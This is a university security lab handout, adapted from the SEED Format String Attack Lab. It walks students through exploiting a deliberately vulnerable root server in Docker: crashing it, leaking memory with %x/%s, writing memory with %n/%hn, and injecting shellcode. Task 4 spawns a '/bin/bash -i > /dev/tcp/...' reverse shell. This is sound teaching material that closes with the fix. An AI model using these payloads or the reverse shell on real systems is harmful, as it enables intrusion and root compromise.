Lab 3: Format String and Reverse Shell
Adapted from the SEED Labs Format String Attack Lab (Ubuntu 20.04 edition) by Wenliang Du. See Attribution and License.
| Environment | SEED Ubuntu 20.04 VM (setup) with Docker + docker-compose — this lab is x86 (32-bit) and needs the multilib toolchain |
| Files | lab3.tar.gz — the SEED Labsetup (Docker docker-compose.yml, server-code/, fmt-containers/, attack-code/), repackaged for this course. Can’t run Docker? Use the backup setup. |
| Submission | One PDF, structured as described in Submitting a Lab Report |
Overview
printf() and its relatives take a format string — the "%d of %s\n" in
printf("%d of %s\n", n, name) — that tells the function how many more arguments to
expect and how to interpret each one. The function trusts that string completely: it
reads one argument off the stack for every % directive it finds, whether or not the
caller actually passed one.
That trust is safe only when the format string is a constant the programmer wrote.
When a program instead lets user input become the format string — printf(user_input)
instead of printf("%s", user_input) — the user, not the programmer, decides how many
arguments printf reads and what it does with them. This is a format string
vulnerability, and it is far more powerful than it first looks: with nothing but a
carefully chosen string, an attacker can crash the program, read arbitrary memory,
write to arbitrary memory, and ultimately inject and run their own code with
the victim program’s privileges.
In this lab you are given a program with a format string vulnerability that runs with root privilege. You will exploit it in four escalating steps — crash it, read its memory, modify its memory, and finally inject shellcode to obtain a root shell — and then reason about the one-line fix that would have prevented all of it.
Topics covered:
- Format string vulnerabilities and code injection
- Stack layout and how
printfwalks its variadic arguments - The
%x,%s,%n, and%hndirectives, and the parameter field%k$ - Shellcode and the reverse shell
Background reading
- Chapter 6 of Computer & Internet Security: A Hands-on Approach, 2nd/3rd edition, by Wenliang Du — https://www.handsonsecurity.net
- Chapter 9 of the same book, for the reverse shell used in Task 4
man 3 printf(read the description of the%nconversion and them$parameter field),man 1 nc,man 1 gdb- The Appendix: how
printfwalks the stack at the end of this lab — read it before Task 2 if the%xcounting feels like guesswork.
A note on architecture (read this first)
Like the SEED lab, we do the whole exercise in 32-bit (x86): the addresses contain
no zero bytes, which keeps the payloads simple, and the stack layout is easier to reason
about. Every gcc command uses -m32. This has two consequences:
- You need the 32-bit toolchain:
sudo apt install gcc gcc-multilib. The SEED Ubuntu 20.04 VM already has it. We also compile-static, so no 32-bit shared libraries are required at run time. - The attack runs actual x86 code. On an Apple Silicon Mac an ARM VM cannot execute the 32-bit x86 binary this lab produces. Contact the instructor on Piazza with your SSH public key and NetID for a department VM. Do not attempt this lab on an ARM VM.
The optional Task 5 revisits the attack on a 64-bit build, where the zero bytes in addresses make things harder.
Host Ubuntu version. This lab is developed and tested on the SEED Ubuntu 20.04 VM, but it also builds and runs on newer hosts (Ubuntu 22.04 / 24.04), because the provided
Makefilehandles the two things that would otherwise break: it pins-std=gnu17(so newergcc, which defaults to C23, still acceptsserver.c’s old-style prototype), and it links every binary statically. The container image is Ubuntu 20.04 (glibc 2.31); a dynamically-linked binary built on a newer host asks the container for a glibc it does not have (GLIBC_2.34 not found) and the server exits at once — static linking bakes libc into the binary so it runs in the container whatever your host is. If you ever see thatGLIBCerror, you are building dynamically: runmake clean && make.
Use Docker (and docker compose) for this lab
Unlike Labs 1 and 2, which ran a single binary on the VM, this lab runs the vulnerable
program as a network server inside a Docker container, and you attack it over the
network with netcat.
If you cannot get Docker working on your machine, a Docker-free fallback is documented in Appendix B: Running Without Docker at the end of this lab.
Before you begin
Note. This lab turns off address randomization and runs a root server that you will deliberately crash and hijack. Everything happens inside containers on your own VM.
Make sure Docker and docker-compose are installed (the SEED VM already has them):
$ docker --version && docker-compose --version
Download the lab source files and unpack them inside the VM:
mkdir -p ~/cs487/lab3 && cd ~/cs487/lab3
wget https://xiaoguang.wang/computer-security-labs/labs/files/lab3.tar.gz
tar xzf lab3.tar.gz
cd Labsetup && ls
You should see:
docker-compose.yml # defines the two server containers and their network
server-code/ # format.c (the vulnerable program), server.c, Makefile
fmt-containers/ # the Dockerfile the images are built from
attack-code/ # build_string.py and exploit.py -- where you build payloads
Setting up the environment
1. Turn off Address Space Layout Randomization (ASLR)
Guessing addresses is a critical step of the attack, and ASLR randomizes the stack, heap, and library addresses on every run. Turn it off on the VM (the containers share the host kernel, so this one command covers them too):
$ sudo sysctl -w kernel.randomize_va_space=0
2. How the program is built, and the compilation flags
The containers run pre-compiled binaries, so the first step is to build them. The
server-code/Makefile compiles the vulnerable program twice — 32-bit (format-32, used
in Tasks 1–4) and 64-bit (format-64, used in the optional Task 5) — plus the server
wrapper, in effect:
$ gcc -DBUF_SIZE=L -z execstack -static -m32 -o format-32 format.c # 32-bit
$ gcc -DBUF_SIZE=L -z execstack -o format-64 format.c # 64-bit
Each flag matters:
-m32— 32-bit x86 (see the architecture note above);-staticmakes it self-contained so the small container image needs no 32-bit shared libraries.-z execstack— makes the stack executable. Task 4 injects code onto the stack and jumps to it; a non-executable stack would block that. Defeating a non-executable stack is the subject of Lab 2; here we leave it off to focus on the format string itself.-DBUF_SIZE=L— sets the stack-layout knobL(theL =line in the Makefile). Your instructor may give you a specific value; it shifts every offset in your payloads, so use the value you are told and set it before building.
Why the instructor picks
L. A differentLchanges the number of%xspecifiers you need and every offset that follows, so a payload built for oneLwill not work for another. This deliberately makes last year’s solutions — and the ones posted online — useless, and forces you to derive the numbers yourself.
Build the binaries and copy them where the Dockerfile expects them:
$ cd server-code
$ make # builds server, format-32, format-64 (set L first if told to)
$ make install # copies the binaries into ../fmt-containers
$ cd ..
3. Build and start the containers
Now build the images and bring the containers up. SEED’s VM defines handy aliases —
dcbuild, dcup, dcdown — for the three docker-compose commands:
$ dcbuild # alias for: docker-compose build
$ dcup # alias for: docker-compose up
Not on the SEED VM? These aliases are not built in — add them once. Append the following to your
~/.bashrc, then runsource ~/.bashrc. (If your Docker uses the v2 plugin, replacedocker-composewithdocker compose.)alias dcbuild='docker-compose build' alias dcup='docker-compose up' alias dcdown='docker-compose down' alias dockps='docker ps --format "{{.ID}} {{.Names}}"' docksh() { docker exec -it "$1" /bin/bash; }
docker-compose.yml starts two containers on a private network:
| Container | IP address | Binary | Used in |
|---|---|---|---|
server-10.9.0.5 | 10.9.0.5 | format-32 (32-bit) | Tasks 1–4 |
server-10.9.0.6 | 10.9.0.6 | format-64 (64-bit) | Task 5 (optional) |
Leave dcup running in its own terminal — this is where the server’s output appears,
which matters for every task below. Open a second terminal for your attacks. Useful
commands (also aliased on the SEED VM):
$ dockps # docker ps, short form: list running containers + IDs
$ docksh <id> # get a bash shell inside a container (first few ID chars)
$ dcdown # alias for: docker-compose down (stop everything)
The server adds a little randomness.
server.cseeds each container with a random-length environment variable when it starts, so the addresses you see differ from your classmates’ — but they stay fixed for the life of the container. As long as you do notdcdown, the numbers are stable and your payloads stay valid. (This is not ASLR; it is just per-student variation.)
4. The vulnerable program
Here is the essence of server-code/format.c (the real file also has a 64-bit branch
for Task 5). It reads up to 1500 bytes from standard input into buf[] — which, on the
server, is the TCP connection — prints the addresses you will need, then passes buf
down through a dummy_function() (whose only purpose is to add BUF_SIZE bytes of
stack spacing) into myprintf(), which hands your input straight to printf as the
format string — the bug.
unsigned int target = 0x11223344;
char *secret = "A secret message\n";
void myprintf(char *msg)
{
unsigned int *framep;
asm("movl %%ebp, %0" : "=r"(framep));
printf("Frame Pointer (inside myprintf): 0x%.8x\n", (unsigned int) framep);
printf("The target variable's value (before): 0x%.8x\n", target);
printf(msg); // <-- THE FORMAT-STRING VULNERABILITY
printf("The target variable's value (after): 0x%.8x\n", target);
}
int main(int argc, char **argv)
{
char buf[1500];
printf("The input buffer's address: 0x%.8x\n", (unsigned int) buf);
printf("The secret message's address: 0x%.8x\n", (unsigned int) secret);
printf("The target variable's address: 0x%.8x\n", (unsigned int) &target);
printf("Waiting for user input ......\n");
int length = fread(buf, sizeof(char), 1500, stdin);
printf("Received %d bytes.\n", length);
dummy_function(buf); // inserts a BUF_SIZE-byte frame, then calls myprintf(buf)
printf("(^_^)(^_^) Returned properly (^_^)(^_^)\n");
return 1;
}
Note the three things the attacker gets for free: the address of buf[] (where your
input lives), the address of the secret string on the heap (Task 2.B), and the
address of the target variable (Task 3). The frame pointer (Task 4) is printed too.
The compiler already warned about this. When the images were built you saw
warning: format not a string literal and no format arguments [-Wformat-security], pointing straight atprintf(msg). That warning is the vulnerability; you will explain and fix it in the wrap-up.
5. A first, benign run
Send an ordinary string to the 32-bit server and watch the output appear in the
dcup terminal (not in your attack terminal):
# In your attack terminal:
$ echo hello | nc 10.9.0.5 9090
# press Ctrl+C if it does not return on its own
# What appears on the server's console (the dcup terminal):
server-10.9.0.5 | Got a connection from 10.9.0.1
server-10.9.0.5 | Starting format
server-10.9.0.5 | The input buffer's address: 0xffffd2d0
server-10.9.0.5 | The secret message's address: 0x080b4008
server-10.9.0.5 | The target variable's address: 0x080e5068
server-10.9.0.5 | Waiting for user input ......
server-10.9.0.5 | Received 6 bytes.
server-10.9.0.5 | Frame Pointer (inside myprintf): 0xffffd1f8
server-10.9.0.5 | The target variable's value (before): 0x11223344
server-10.9.0.5 | hello
server-10.9.0.5 | The target variable's value (after): 0x11223344
server-10.9.0.5 | (^_^)(^_^) Returned properly (^_^)(^_^)
(Your addresses will differ from these — remember the per-container randomness — but
they are stable until you dcdown.) The Returned properly line and the unchanged
target value are your signal that nothing went wrong; in the tasks below, their
absence or change on the server console is how you know your payload worked.
Because most payloads are long and contain non-printable bytes, build them with the
provided Python scripts in attack-code/ and pipe the resulting file to nc:
$ cd attack-code
$ ./build_string.py # writes the payload to ./badfile
$ cat badfile | nc 10.9.0.5 9090
Task 1: Crashing the Program
Your first task is the simplest damage: provide an input that makes the program
crash instead of returning properly. On the server console you will know it crashed
because you do not see the (^_^)(^_^) Returned properly line after your connection —
the format child died. (The server process itself keeps running and accepting new
connections, because each request is handled in a forked child; only the child crashes.)
Think about what printf does with a format string full of directives when the caller
passed no matching arguments. Each %x makes it read another 4-byte word off the
stack and print it as a number — harmless, if odd. But %s makes it treat that word
as a pointer and dereference it, reading a string from wherever that word points. Feed
it enough %s and sooner or later one of those stack words is not a valid pointer, and
the read faults.
$ echo '%s%s%s%s%s%s%s%s%s%s%s%s' | nc 10.9.0.5 9090
# (standalone backup: echo '%s%s...' | ./format-32)
Watch the dcup terminal: a benign run ends with Returned properly, a crashing run
does not.
Deliverable. The input you used and a screenshot/transcript of the server console
showing the program crashed (no Returned properly). Explain why your input crashes it —
which directive causes the fault, and what printf is trying to do at the moment it
dies. If %s alone did not crash it on the first try, explain why you might need
several.
Understanding check. A string of
%ndirectives will also crash the program, but for a different reason than%s. What is that reason? (You will use%non purpose in Task 3 — here it crashes because of where it tries to write.)
Task 2: Printing Out the Server Program’s Memory
Now make the program leak its own memory. The leaked data prints on the server’s
console (the dcup terminal), where a true remote attacker could not see it — so this
is not a practical attack by itself. The point is the technique: finding where your
own input sits among the arguments printf walks. That offset is the single most
important number in the whole lab; every later task depends on it.
Task 2.A: Stack data — find the magic number
When printf starts consuming %x directives, it walks up the stack from just above
its own arguments. A few words up, it reaches the memory that holds your input string
itself (buf[]). If you can count how many %x it takes to get there, then the next
directive is reading bytes you control.
Put a recognizable 4-byte marker at the very front of your input, follow it with a run
of %x separated by dots, and count: when one of the printed values comes back as your
marker, the number of %x up to and including it is the magic number k.
# build_string.py (sketch)
content = bytearray(0x0 for i in range(1500))
content[0:4] = (0x44434241).to_bytes(4, byteorder='little') # "ABCD" marker
s = ".%x" * 30
content[4:4+len(s.encode())] = s.encode('latin-1')
$ ./build_string.py # writes ./badfile
$ cat badfile | nc 10.9.0.5 9090 # (standalone backup: cat badfile | ./format-32)
On the server console, read across the printed %x values until you see ...41424344...
(your marker). Count the %x positions to it. You can confirm with the parameter field:
%k$x should print the marker directly.
Deliverable. Your input, the output showing your marker appearing in the %x dump,
and the value of k — the number of %x needed to reach the start of your own
input. Explain what those first k−1 values you skipped over actually are (whose stack
words is printf printing before it reaches your buffer?).
Task 2.B: Heap data — read the secret string
The program stores a secret string on the heap and prints its address for you. Use
the vulnerability to print the contents of that string. The idea: place the
address of the secret at the front of your input (little-endian, in binary), use your
magic number k to walk printf’s argument pointer to that address, and then a %s
dereferences it and prints the string.
secret_addr = 0x080b4008 # from the program's printout
content[0:4] = (secret_addr).to_bytes(4, byteorder='little')
# then reach slot k with (k-1) %x, and finish with %s -- or just use %k$s
Deliverable. Your payload and a screenshot showing the secret message printed.
Explain how the address at the front of your buffer becomes the argument that %s
dereferences, and why the byte order of that address matters.
Understanding check. The leak prints on the server’s console, where a real remote attacker cannot see it. Why is the technique still essential even when the attacker cannot read the leak? (Hint: Tasks 3 and 4 use the same
kto write, not read.)
Task 3: Modifying the Server Program’s Memory
Reading memory is serious; writing it is worse. The %n directive does not print
anything — it writes the number of characters output so far into the address given
by the corresponding argument. Point that argument at the target variable and you can
change its value. target starts at 0x11223344; the program prints its value before
and after, so you can see your write land.
The mechanism is exactly Task 2.B, but with %n in place of %s: put target’s
address at the front, walk to it with your magic number k, and write with %n.
Task 3.A: Change target to any different value
Success is simply making the “after” value differ from 0x11223344.
target_addr = 0x080e5068 # from the program's printout
content[0:4] = (target_addr).to_bytes(4, byteorder='little')
# reach slot k, then %n (the value written is however many chars printed so far)
Deliverable. Your payload and the before/after output showing target changed.
State what value it changed to and explain where that number came from.
Task 3.B: Change target to exactly 0x5000
%n writes the count of characters printed so far. To land a specific value you
control that count — usually with a width field such as %.20000x, which prints a
number padded to 20000 characters. 0x5000 is 20480 in decimal, so arrange for exactly
20480 characters to have been printed at the moment %n fires (remember to subtract the
bytes you already printed before the width directive).
Deliverable. Your payload and the output showing target is now 0x00005000.
Show the arithmetic: how you made the running character count reach exactly 20480.
Task 3.C: Change target to 0xAABBCCDD
0xAABBCCDD is 2,863,311,581 in decimal — a single %n would have to print nearly 3
billion characters, which takes far too long. The fix is to write two bytes at a
time with %hn (or one byte with %hhn): write the low half-word and the high
half-word to target and target+2 separately, so the largest count you ever print is
about 65535 characters.
Because %n writes a running, monotonically increasing count, order the two writes so
the required count only goes up: write whichever half-word is the smaller number
first, then print the difference in characters before writing the larger one.
content[0:4] = (target_addr ).to_bytes(4, byteorder='little') # for the low half
content[4:8] = (target_addr + 2).to_bytes(4, byteorder='little') # for the high half
# then two %hn writes, with width fields chosen so the counts hit 0xCCDD and 0xAABB
Deliverable. Your payload and the output showing target is now 0xaabbccdd.
Explain why %n would have been impractical here, how %hn fixes it, and why the
order in which you write the two half-words matters.
Understanding check. You placed the addresses to write to at the front of your input and the value came from the character count. Explain, in one or two sentences, why the attacker controls both the address written to and the value written — this “write-anything-anywhere” primitive is what makes Task 4 possible.
Task 4: Inject Malicious Code into the Server Program
Now the crown jewel. Instead of writing to target, you will use the same
write-anything-anywhere primitive to overwrite a return address, redirecting
execution into shellcode you placed in the buffer. Because the program runs as
root, the shell you get is a root shell.
The plan
- Put shellcode in the buffer.
exploit.pyalready places a 32-bit shellcode near the end of your 1500-byte payload. Its start address isbuf_address + start_offset— andbuf_addressis printed by the program. - Find the return address slot. When
myprintfreturns, the CPU jumps to the address saved just abovemyprintf’s saved%ebp. The program prints the frame pointer; the return-address slot is at frame pointer + 4. (Work through the Appendix if this is unfamiliar.) - Overwrite that slot with the shellcode’s start address, using the two-
%hntechnique from Task 3.C — low half-word toret_addr, high half-word toret_addr + 2. Whenmyprintfreturns, it “returns” into your shellcode.
The stack when printf runs inside myprintf
higher addresses
+--------------------------+
| buf[1500] (your input | <- your shellcode sits near the top of this;
| lives here, in main) | its address = buf_address + start_offset
+--------------------------+
| .... |
+--------------------------+
| return address of | <- overwrite THIS (at frame pointer + 4)
| myprintf() | with the shellcode's start address
+--------------------------+
| saved %ebp of myprintf | <- frame pointer points here
+--------------------------+
| .... |
+--------------------------+
| format string arg ---> | <- printf starts walking its args from here;
| (points into buf) | your magic number k counts up to buf
lower addresses
Demonstrate code execution
The shellcode in attack-code/exploit.py runs /bin/bash -c "<command>". It ships with
a harmless demo command (/bin/ls -l; echo '===== Success! ======'). Fill in the
format-string portion of exploit.py to overwrite the return address, then fire the
payload at the server:
$ ./exploit.py # build badfile
$ cat badfile | nc 10.9.0.5 9090 # (standalone backup: cat badfile | sudo ./format-32)
Watch the server console. If your overwrite landed, you will see the ls listing and
===== Success! ====== — output produced by your injected code, running as root
inside the server. If you instead see Returned properly, your overwrite missed; a
segfault means your target address or count is off. Recheck k, the frame pointer, and
your two half-word counts.
Get a root reverse shell
A fixed command is not control — and on the real server its output prints on the server
console, where you cannot see it. For an interactive root shell you drive, switch the
shellcode’s command string to a reverse shell that connects back to a listener you
run. In exploit.py, change the command string, keeping the * in the same column by
padding with spaces (its position is hard-coded in the shellcode):
"/bin/bash -i > /dev/tcp/10.9.0.1/7070 0<&1 2>&1 *"
10.9.0.1 is your VM’s address on the container network (the gateway the containers see);
7070 is a spare port for the shell, kept separate from the server’s 9090. Start the
listener on the VM, then fire the exploit:
# Terminal 1 (on the VM) — the attacker's listener
$ nc -lnv 7070
# Terminal 2 (on the VM) — trigger the vulnerable root server
$ ./exploit.py
$ cat badfile | nc 10.9.0.5 9090
The listener should receive a shell. Confirm it is root, and that you are inside the container (its hostname is the container ID):
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
<container id>
Why a reverse shell here? The server child’s standard input is the TCP connection that carried your payload; a plain interactive
/bin/bashwould fight over that same socket and give you no usable prompt. The reverse shell sidesteps this by opening a fresh connection (/dev/tcp/...) for the shell’s own input and output. (In the standalone backup, stdin is the exhaustedbadfile, so a plain shell would read EOF and exit immediately — the reverse shell fixes that too; point it at127.0.0.1.)
Deliverable. (1) Evidence of code execution with the demo command. (2) Your
reverse-shell attack: how you laid out the shellcode, how you derived the return-address
slot from the frame pointer, and how you split the shellcode’s start address across two
%hn writes. (3) A screenshot of the root reverse shell with id showing
uid=0(root). Mark on the stack diagram where your shellcode is stored, with its
concrete address.
Understanding check. You overwrote a return address with an address on the stack, and the CPU happily executed instructions there. Which one compilation flag, if removed, would have stopped this exact attack — and which Lab 2 technique would an attacker then reach for instead?
Task 5 (Optional, 1 bonus point): Attacking the 64-bit Program
The second container, server-10.9.0.6 (10.9.0.6), is already running the 64-bit
build (format-64) — it came up with dcup, so there is nothing new to compile. Point
your attack at 10.9.0.6 and mount the same code-injection attack to get a root shell,
this time selecting the 64-bit shellcode in exploit.py (shellcode = shellcode_64):
$ cat badfile | nc 10.9.0.6 9090
The new obstacle is zero bytes in addresses. On x86-64, valid addresses run only up
to 0x00007FFFFFFFFFFF, so every 8-byte address has zero bytes in its high end. You
cannot drop such an address into the middle of your format string, because printf
stops parsing at the first 0x00. You must decide where in the payload the
zero-containing addresses can safely go, and use the parameter field (%k$...) to reach
them.
The parameter field makes this manageable: %k$x reads the k-th argument directly,
and you can move the pointer back and forth freely:
printf("%3$.20x%6$n%2$.10x\n", 1, 2, 3, 4, 5, &var); // writes 20 into var
Deliverable. Your 64-bit payload and a screenshot of the resulting root shell. Explain specifically how you handled the zero-byte problem — where you placed the addresses in the payload and how you reached them — and how the 64-bit stack layout differed from the 32-bit case.
Wrap-up: Fixing the Vulnerability
Go back to the compiler warning you saw while building the images:
warning: format not a string literal and no format arguments [-Wformat-security]
In server-code/format.c, change the vulnerable line in myprintf from printf(msg);
to printf("%s", msg);, then rebuild and restart the container so the fix takes effect:
$ cd server-code && make && make install && cd ..
$ dcbuild && dcup
Confirm both that the warning is gone and that one of your earlier attacks (say,
Task 3.A) no longer works. (Standalone backup: just make and re-run ./format-32.)
Deliverable. State in your own words what the warning was telling you, show the
one-line fix, and give evidence that the fix defeats your attack (the warning is gone
and target no longer changes). Explain why printf("%s", msg) is safe when
printf(msg) was not — what does the user no longer control?
Cleaning up
Stop and remove the containers, and undo the global change this lab made to your VM:
$ dcdown # stop and remove the containers
$ sudo sysctl -w kernel.randomize_va_space=2 # re-enable ASLR
Kill any leftover nc listeners. You can reclaim disk space from the built images with
docker image rm seed-image-fmt-server-1 seed-image-fmt-server-2 once you are done. (In
the standalone backup, just delete the format-32/format-64 binaries and any badfile
payloads you built.)
Submission
Submit a single PDF containing, for each task: the commands you ran, a screenshot
or transcript of what you observed, and an explanation of why it happened. For the
attack tasks, include your build_string.py / exploit.py and state clearly how you
derived the magic number k, every address, and every character count. List the
important code snippets followed by explanation — attaching code with no explanation
will not receive credit.
See Submitting a Lab Report for the expected structure.
Appendix A: How printf Walks the Stack
If the %x counting in Task 2 feels like guesswork, this is the mechanism behind it.
A variadic function like printf receives its first argument (the format string) in the
usual place, but it has no idea how many arguments follow — the format string is the
only thing that tells it. Every time printf scans a conversion directive (%x,
%s, %d, %n, …), it grabs “the next argument” by advancing a pointer through the
memory that sits just above the format-string argument on the stack, and interprets
whatever is there according to the directive:
%x— read the next 4-byte word, print it as hex. (Just reads; harmless.)%s— read the next 4-byte word, treat it as a pointer, and print the string it points to. (A bad pointer faults — this is Task 1.)%n— read the next 4-byte word, treat it as a pointer, and write the number of characters printed so far to that address. (This is the write primitive — Tasks 3 and 4.)%hn/%hhn— like%nbut write only 2 bytes / 1 byte. (Task 3.C.)%k$...— skip straight to the k-th argument instead of walking one at a time. (Task 5.)
The attacker’s leverage comes from two facts working together:
printfkeeps reading arguments for as long as the format string tells it to, even past the arguments the caller actually pushed — so it walks off into other stack memory.- A few words up that stack, it reaches
buf[]— the attacker’s own input. So the attacker can plant an address in the buffer and then use%s/%nto makeprintftreat that attacker-chosen value as the pointer to read from or write to.
The magic number k from Task 2.A is simply how many arguments printf must walk
before its pointer reaches the start of your buffer. Once you know k, every other task
is a variation: reach slot k, then read (%s) or write (%n/%hn) through an address
you planted there.
Appendix B: Running Without Docker (Backup Setup)
If you cannot get Docker working, download
lab3-standalone.tar.gz instead. It contains the same
format.c and the same attack-code/ scripts, with a trimmed Makefile that builds the
vulnerable program so you can run it directly, feeding the payload on standard input
instead of over the network:
wget https://xiaoguang.wang/computer-security-labs/labs/files/lab3-standalone.tar.gz
tar xzf lab3-standalone.tar.gz && cd Labsetup
make # builds format-32 and format-64 (set L first)
echo hello | ./format-32 # the benign run, output right in your terminal
Everything else in this lab is identical — the payloads, the addresses logic, and the
reasoning. The only differences: the program’s output appears in your own terminal (not
on a separate server console), and wherever a task says ... | nc 10.9.0.5 9090, you
instead run ... | ./format-32. For Task 4 you run the program as root to stand in for
the root server — cat badfile | sudo ./format-32 — and point the reverse shell at
127.0.0.1. These substitutions are noted again where they matter.